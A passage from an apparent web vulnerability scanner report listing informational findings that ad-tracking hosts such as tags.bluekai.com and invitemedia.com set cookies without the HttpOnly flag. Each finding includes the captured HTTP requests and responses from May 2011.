BK-Server: a96f
Content-Length: 239
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://d.xp1.ru4.com/activity?_o=62795&_t=cm_bk&redirect=http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2751%3Fid%3d%7euk%7e" width=1 height=1 bor
...[SNIP]...
18.151. http://tags.bluekai.com/site/2751  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2751

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2751?id=AM-00000000030620452 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bklc=4dc47740; bk=hClmGdJCToZVIHOf; bkc=KJh56XXgHaWDOdeFBzIwsSmjhDQBMV/1uzG6aeqsprJ+LqYxjZ1FFbJsAkijZAyoSp2KMzPLnJCZJ7IYCPnYoYyDstnawRdgFUmU7d3KzX228fbQe8Mm9sBnPbR9WJuK6M0orUbnK0eWwV1TEFrOunF9IW4jg1VGf5xbZYZFUJaajtc9kv8O0cjK1IVP2pl9bQiyLaStp0mdeU1dSzT1zK2ooFfvllvIiSp9MPUb52LL5fv4m2pB4H7MFG832E+QoFmP5hFk4KGaLr2a6TBZtbISvSdzT9Ur8c8uP+srJtXLz3zNDfN0w9ODfyDZEh6dSvSXLiUlUuQ9wzKmHfKTvSXzSjnFgDF9fdJne10DPfbx2DRameC0FBlOEU7kKE74jNPQ1a96exMqLD4rELt2XMtbUqwYfPFZ4ofMqZlCo7ZDEqZ4n6BQnw9fcp7KOtqf4dZpP2Tdkh9G7JpdI0fvEKdaqSoUgowmcyoRn32opiRzKIUlvIU97BgAE3S8fqtbI+NsKUISpttSEdAcBGw7lx==; bko=KJ0qh1q9TaOIhJKqTxTF96BJpDa4JQjPmWrVMTcChrGeFAG1AkYV/WmR/9mee4XIU6Rss0ena1p08GVyZOQuGuhZCi3QMoBn5QOkM5AjswSOVxYg7CZB; bkst=KJhkMfNv96WDCSz/YsjMYALCVBQrpmI5sqO/Ms+DYYsrokuzjqRJJWUzUHan70ORtRLiiGtQCuQHLqqhsuhLfs05lugGgRqF7cwFZHJb7WPrpibKtiU6fBTpvO76OXBLD12KcjgXH0XmnSs/Vu39VNX3RlyKVIWqE1eUNkCkaKS9t4MphF74oNK/S7fGtba8hYxs6JHhvRCQ9oMxr2beAbFk3zH0AViUiyx7VkWmPa/rxO/v3kf/J2mJQImJxbzmnun5fH8sthtHgBmB4q7u8tAgovssJmb6Hra3Xb5t8fp7pgr9ZG6QeB32nQbuqYFRkvBAe6yMcDPgylfH3InkJ4nME9WZZkvoUOZihkdUE38PWwJxNgWZShph7quUKo58rR2vlAxYYYmTy/EsOsBL5OyHD/RqczDxbq4fVIK2ZFFp2PdA3s6B; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YROQ9B3Nuw; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 06 May 2011 22:33:40 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=kLyq54JCToZVIHOf; expires=Wed, 02-Nov-2011 22:33:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5666GHaWDOdedjU01MXSYNOeasOvvD1hZ01qiqqsyAsjMnNIBsAkiHDtDLFRhBHSpLVYR0zgSx3AJAfJxq/QP8p0r2X85drodpMll74Lr0QOFaCijFf/DQ9F05S46o15haUkisyifws8TpceJZ7Hl+EElNT8P99tBYL14sSL//5rHjxCpUM+nHu5IyY/UGBot6Me7+UzvQSPOReSSLz2MFyN/wh7Kfo4K1Lp2+q2oF+sTyZliX+dND2JeU5nIPr7pGwHByvM4QeY4gfNjEFzoDRidobNYNBCIBzh8fP/FAvw2HOJor8b21iz51XpNtM6I/cIF1cqLI1Wy8fDE+m2DYZQf5OhSAISX5A1kFqzVCx3UUT/x8gpts5PfbelFcECKq8nZFwR1p4KjPIMpou6wkmlQGlupTUjbMtTUnW3UnDQdE6FUNDgpwBGVfK4nGhetdzfcfrZ9LwtddBkn22d+PDQ574Tfa8eZ2I/tNtLUA8wfYQZUGTqMFRb22w6r50WzVjDKiA7qKlUNryF/dM04tp042QXi+dcO; expires=Wed, 02-Nov-2011 22:33:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Ae2ny69RhZXGYeSNQt8YzU9BlBdlfLYCLRNP/jxSfSCT/PAvfPeEieMbYR3Er0iir9Qbia/HjhzdQTmnZbrUQaOXoIw8wzI2pN6JwzTimtzUE6WJw5Fp9F/YadXBy69hafujFPGILUyso4NK48eNbTU6R3PkansRYrYhv8DhnA2iTHo1yBVhiPVL1941hoXlNFXI4RVG8krdgEuwZ1x9ZM/rOHa19OBbNlZyra3Ku3yDiSOzJeMHi7vQA7/OAkOx2xv4EYzmMi5VmgUuW+v5pZs6lHqom+lRkbL2wZ3aBBuxJrlV1syt4ZolN7+rFRrGT4ZCclxftWIpnU2Ee+121B8Gsv6BKAVFiomU0JzpOjCGu3V0jRQS4NNqUvLQ8vYLcjF1mI/fGIf/rzpn4PE0JCJ9s1WaJMxC2oIBEi/Y07YMGyxidUjdSfNUzdIKdQFOoVTw; expires=Wed, 02-Nov-2011 22:33:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 07-May-2011 22:33:40 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
18.152. http://tags.bluekai.com/site/2753  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2753

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2753?id=c1e1301e-3a1f-4ca7-9870-f636b5f10e66 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bklc=4dc47740; bk=hClmGdJCToZVIHOf; bkc=KJh56XXgHaWDOdeFBzIwsSmjhDQBMV/1uzG6aeqsprJ+LqYxjZ1FFbJsAkijZAyoSp2KMzPLnJCZJ7IYCPnYoYyDstnawRdgFUmU7d3KzX228fbQe8Mm9sBnPbR9WJuK6M0orUbnK0eWwV1TEFrOunF9IW4jg1VGf5xbZYZFUJaajtc9kv8O0cjK1IVP2pl9bQiyLaStp0mdeU1dSzT1zK2ooFfvllvIiSp9MPUb52LL5fv4m2pB4H7MFG832E+QoFmP5hFk4KGaLr2a6TBZtbISvSdzT9Ur8c8uP+srJtXLz3zNDfN0w9ODfyDZEh6dSvSXLiUlUuQ9wzKmHfKTvSXzSjnFgDF9fdJne10DPfbx2DRameC0FBlOEU7kKE74jNPQ1a96exMqLD4rELt2XMtbUqwYfPFZ4ofMqZlCo7ZDEqZ4n6BQnw9fcp7KOtqf4dZpP2Tdkh9G7JpdI0fvEKdaqSoUgowmcyoRn32opiRzKIUlvIU97BgAE3S8fqtbI+NsKUISpttSEdAcBGw7lx==; bko=KJ0qh1q9TaOIhJKqTxTF96BJpDa4JQjPmWrVMTcChrGeFAG1AkYV/WmR/9mee4XIU6Rss0ena1p08GVyZOQuGuhZCi3QMoBn5QOkM5AjswSOVxYg7CZB; bkst=KJhkMfNv96WDCSz/YsjMYALCVBQrpmI5sqO/Ms+DYYsrokuzjqRJJWUzUHan70ORtRLiiGtQCuQHLqqhsuhLfs05lugGgRqF7cwFZHJb7WPrpibKtiU6fBTpvO76OXBLD12KcjgXH0XmnSs/Vu39VNX3RlyKVIWqE1eUNkCkaKS9t4MphF74oNK/S7fGtba8hYxs6JHhvRCQ9oMxr2beAbFk3zH0AViUiyx7VkWmPa/rxO/v3kf/J2mJQImJxbzmnun5fH8sthtHgBmB4q7u8tAgovssJmb6Hra3Xb5t8fp7pgr9ZG6QeB32nQbuqYFRkvBAe6yMcDPgylfH3InkJ4nME9WZZkvoUOZihkdUE38PWwJxNgWZShph7quUKo58rR2vlAxYYYmTy/EsOsBL5OyHD/RqczDxbq4fVIK2ZFFp2PdA3s6B; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YROQ9B3Nuw; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 06 May 2011 22:33:23 GMT
Set-Cookie: bklc=4dc47733; expires=Sun, 08-May-2011 22:33:23 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=QT5qXdJCToZVIHOf; expires=Wed, 02-Nov-2011 22:33:23 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XXgHaWDOdeF7HAdhGdsQ+xxhHiua/jiB+CjFmtyLJOZR0IdsMVuh/3SEYkgwbqsRMRVEWqIO9rkJApvxgWCPopprBTf5dZoff7llc4m3bLYo7SO6zPguysG/6XSMCZrtJer38KK2MArAvrFQ9sURyFu7B5mNQ9+gxgMcyVgeacqXPD/zNffiGomQTOa23eK5+Ry8fUlF1evYeY4vBMlL5IsojX1fy8JfhMZXfVd3qIJk1J+8Fn4pEwuRfluyDfoife6EziGlT/ylbI2UDlF3PO/FKz+nhoLFhgZFcSkc0MuwmmjFalwUkrxECgZKrlI9aYbPTi5mcTypc7+e16fkymbMChcBbx8g2NuudFjGPeMXALRyopUw35bcIlqd3cMpEjopZFwDUI4JRUOxBf0x5Amw63lsIbZ4UEqL0h5+uE2wYF5NYMBdVCqBJXF7XJGTnzd57XwCmldbX2IK7XbGo9fwF+l1uEBII/tNtrUAf1cYCZUWTjEWz5II7bUSxMcNbUcA+ntUal7lRUAI504t2042Qdie4ag; expires=Wed, 02-Nov-2011 22:33:23 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Ae2n9pWRCp1DOcrNQbBxcaywXF5B9Qb+KkSaDrooHbD8zArCcKg5iEMbYR3Er0iir9Qbia/HjhzdQTmnZbr8z0kZYgdlI4WIuxA2piJlpibKViU6fmTpvO76OXBLD12KUEHh6HvviYD1WIrpcGk2cFVAg8UW4Qy1M/QJ+QYLTadIKsSo9s823RphKV0aqp9OUN+MkPVR9tqMphFcF6IFaBUzT++aXTCJev9oTN/xyxxyG4KXOpKrk3zS06VMPuTS7sCamPOJrxOJvvCb1EbjqCyzENh6b3Jaoer5yti7nj/Br+ZEvltKBA1SSAMi571Dg3lINmTzKIfROqESY1vQNKlQ/1ZtQ068uFqOBBJH+efLaNTPn84/kp1aZsCvoU/0H/tdg+tTPAc/xN7qZ3hhhc4Eqro587/4k5hW9QQMr1YWr+dWtmQT/391Bp3v/5JF2fKmFjgf2dH4LBkpuQ==; expires=Wed, 02-Nov-2011 22:33:23 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 07-May-2011 22:33:23 GMT; path=/; domain=.bluekai.com
BK-Server: ddb4
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
18.153. http://tags.bluekai.com/site/2948  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2948

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2948?phint=idswap_partner=bk HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=9b6b0&phint=ord=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bklc=4dc52bfa; bk=uXtktHA+ZqtVIHOf; bkc=KJh56XXgHaWDOdeFBKwceJojAWvMsWmu/CupXVBkXqqeyAvSMqlsM6SBJnsiJAojIpWNagmhRen0JNQGJE2uaGGBLKvzjIbX5If0DI5fff7F7O46981fy1MY+KVahh1AhyhUgAFlNAkwKh6U0BPUyeCj9VecW+JzgXl83KJ2faxBWsoHswL3VmV/tGbFxJMptkzDmZ6Wnc/jbZh7eUm223TcVOTs8o1aIpfth8e6iIs5xKk+yl0I2idNB8aVr1Nzk+yX/plS/2lR/U6HAqTJsdkBYww2tkFP2J8vC4H7lFvQlFSfRSfUgF/O2pE4KYjF82ZgYKZDRz8g2yV98yKat/7MHXBzg8tCKK50xmKHTIibBB5gCtoow2GPSkhIi6YRbfUwvKIkd5Ld5npHvLlNt7wDldKpyA9QEdrgqWKKoBL152WIrkttJmN4kcb5kV83AmjI+YtSpT2URuEylhIfghFY2F2V+/dKF2KFAeLIvdAIn1lfTMq7+uF/txmaM1+JyIkIhpfb4o5fW/bFuRIZomt8rLbfYXFprEIlrEd+wtbDXzQ=; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkst=KJh5Ae2n9pWRCp1DOcrNQb1QeZ80An2FW7OGgV5PvvVK5kuS/fzDt3cz7EMfYR3Er0iir9QbivvGLTr4yzcaEU9050faEmclwMdKJ0ZCrt7ApFco4SrWc+h2YiVedZYReVgjLTLKUqu//Z/JyXEbgW5i76z2bVLkLHXe90BiQiN9GIY4d7CZ3xOr4SZ1XUkLCVXy9P2qR8PPZ9BZTT2nhf2BgCEPlmnnHqm/ux0QvKBuW1WW1valFPLlgoR7sL+aGNDrsohGHEkxuqA9uuiGVMWI7spXnntTb1CaY6ClmFFH5kLAbluMJN4bwstsBBuxhmlZvah+4124mdqWLUmGDxdYGBU+TYeJ+GJBmDgtyBEEDqxtfO5KauIU0JzpOjCGu3P01AuBw0dzKnbYA/K0+MPjdReFoBlDmXFklir8ixxxH7YOYUVdiqcHzDH9sV86aWmAUtIrccLIXIdoFdRcz81=; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Sat, 07 May 2011 11:25:06 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Sun, 08 May 2011 11:25:06 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=xodlbCA+ZqtVIHOf; expires=Thu, 03-Nov-2011 11:25:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XLgCsWDOFe7BK10nG66DGCieW7vC1nsjVUhVxTnYtAt27JgN9iJaEPH0+okiLPLnJi1I9XLkJJgnOxqRLD8cbdFmI2iagXbpl7wpeZpD9OXwiiDBJNqYL9YIukUKG9IqQ2fcH479TBgxw4AZKVahXmms185ksTJuc1dfx08TOEG/lBd5ZHYZrrNmEd62hTfUQCDPuF64ZuLqcEjML8YZwwSohxbv9zLzCRY+FzBzfltrQKRbxEsRh7fw4jqCduMTqPtbPUeladfZIqgE0CzJAdIUEAil51LUPTF4H0uFQQSIVD/XdFSvfE4B2odTMN+KPO3I2DyNtF7IROgtZX6ZqqpfnAJbqCCpZrcdze2MDJApds+RSfUE+vID0ZQRz5hNb/6Nt+Ua5a2NYADrFyuQMeUSh2HlAFl+f7+KvksZrrNhtiIplraB7ISfk4je+NJNhoroc+6mt+Sm72vI7kDr3J1Zr4H+ZQdUNbaqFdF4mhyWTE+d2r444E2BNGPDgrcdfTmuFm2r1N8fHp0dojY6rVRTDugRhd24izqW/fmud4WoKt2rFo5OVPd7L2+7AdfOyj5d16=; expires=Thu, 03-Nov-2011 11:25:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5DeNny69RF3WQtBuYMAJhzeHy7Id5QRmNh3oxuGNtPcgCLCESGuxHjl2OzU/UHHxUxx5HacPtXEzTrni8KGknXSSc8Tw7KSIWf3KHK057eb6uK7HTYiVedZYRePS0a6z2mVGHHzxuCG7NVRdWwG2b6+5vRMXsOAqWOar9HraddF1puyPyb6+kM12Mvl0eY4MSs3rLyCyysl2Km4dfjvVG8irIcEVcZ1x9ZM/rOHa19OBbpf+pzgDXAPQrW3N0AKOWvX3OuLGauWJOgHE0DEAdzUqoNKaMChKxf7xmGottueqGjAIr277SesZG/R7qpPsTNFiolEMF34wmG6R2Y/BV+TmeJBLm+rxGtx5EE64HIgO4evoTKUFK0CHQGiZP036QSFhNbKHSOuWwjVNgLFGCl6tf3UKKgd3G8WLAQeYYY60GI6S1MRTM9LoyGb1R/FNtKItXapwdqFTaniJFkx==; expires=Thu, 03-Nov-2011 11:25:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sun, 08-May-2011 11:25:06 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
18.154. http://track.websiteceo.com/m/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.websiteceo.com
Path:   /m/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/?id=411330&amp;pc=0&amp;p=home&amp;gr=home&amp;tr=home&amp;trid=1304730939&amp;ord=&cs=UTF-8&s=1&cpu=&rf=bookmark&frl=0&hr=http%3A//www.lbmctech.com/&je=y&ce=y&sl=&bl=&ul=&nl=en-US&shw=1200*1920&scd=16&tz=-5&pg=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&rndm=0.2219536614138633 HTTP/1.1
Host: track.websiteceo.com
Proxy-Connection: keep-alive
Referer: http://www.lbmctech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:32:23 GMT
Server: Apache/1.3.39 (Unix) mod_perl/1.30
P3P: policyref="/w3c/p3p.xml", CP="policyref="/w3c/p3p.xml", CP="NOI DSP COR CUR OUR STP""
Set-Cookie: hitlens=visitor&vasya-1304731943-7162; domain=websiteceo.com; path=/; expires=Mon, 06-May-2013 01:32:23 GMT
Pragma: no-cache
Cache-control: no-cache
Content-Type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
18.155. http://va.px.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1=eJzjYuZYEMzFzHE0h4uF48QTJiB5sJsRSE56ygQUbowAEudygMRpkILjYAU7djECBf6FA5l734OY042BzDk/QHLvDjADyc4OEDn3B8iIiSpA5ovdzFxcHDv3MQscOrjsHQsXEwcHUGpjMVDqyQWQdSfBut/uBum78B3EPnQERM4Eizf/B5n0jwPIbAIz9/sBmRf3guRe7gORa/czAgDZyTWv

Response

HTTP/1.1 302 Found
Date: Sat, 07 May 2011 01:18:38 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAXebdj+jgUocrCbEUhOesoEVNIYASTO5QCJ0yDFO3aBpI4/AUn9Cwcy975nBDKnGwOZc34wAcl3B5iBZGcHM1B4ogqQORcozMTBAbRjJ9COQweXge14sRukYGMxkPnkAsjMt7tB+k6CzbjwHUQeOgIiZ4JFmv+DbeQAMpvAzP1+QObFvSC5tftB+l/uYwIAqJw6nw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Sun, 06-May-2012 01:18:38 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268516&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

18.156. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?pid=394&url=http%3A%2F%2Fwww.scmagazineus.com%2Fsubscribe%2Fsection%2F122%2F&pageUrl=http%3A%2F%2Fwww.scmagazineus.com%2Fsubscribe%2Fsection%2F122%2F&time=1304749860650 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
